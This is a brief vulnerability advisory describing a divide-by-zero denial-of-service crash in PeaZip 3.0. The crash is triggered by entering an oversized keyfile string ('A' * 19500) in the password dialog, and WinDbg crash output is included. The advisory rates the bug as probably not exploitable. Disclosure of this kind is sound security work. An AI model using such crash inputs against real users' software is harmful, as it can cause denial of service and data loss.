Peazip 3.0 suffers from a division by zero attack resulting in denial of service vulnerability and possibly loss of data.
To trigger the vulnerability open up the application, click tools, enter password / keyfile.
password: test
confirm password: test
keyfile:"A" * 19500
----------------------------------------------------------------------------------------------------
(d80.8c): Integer divide-by-zero - code c0000094 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000032 ebx=00000032 ecx=00000000 edx=00000000 esi=0173f754 edi=01dd7dd8 eip=00524ea2 esp=0173f438 ebp=0173f440 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** WARNING: Unable to verify checksum for image00400000 *** ERROR: Module load completed but symbols could not be loaded for image00400000 image00400000+0x124ea2: 00524ea2 f7f9 idiv eax,ecx 0:000> !exploitable No export exploitable found 0:000> !load winext/msec.dll 0:000> !exploitable *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\system32\USER32.dll - Exploitability Classification: PROBABLY_NOT_EXPLOITABLE Recommended Bug Title: Integer Divide By Zero starting at image00400000+0x0000000000124ea2 (Hash=0x00020e6f.0x637a584a)
This is a divide by zero, and is probably not exploitable.
|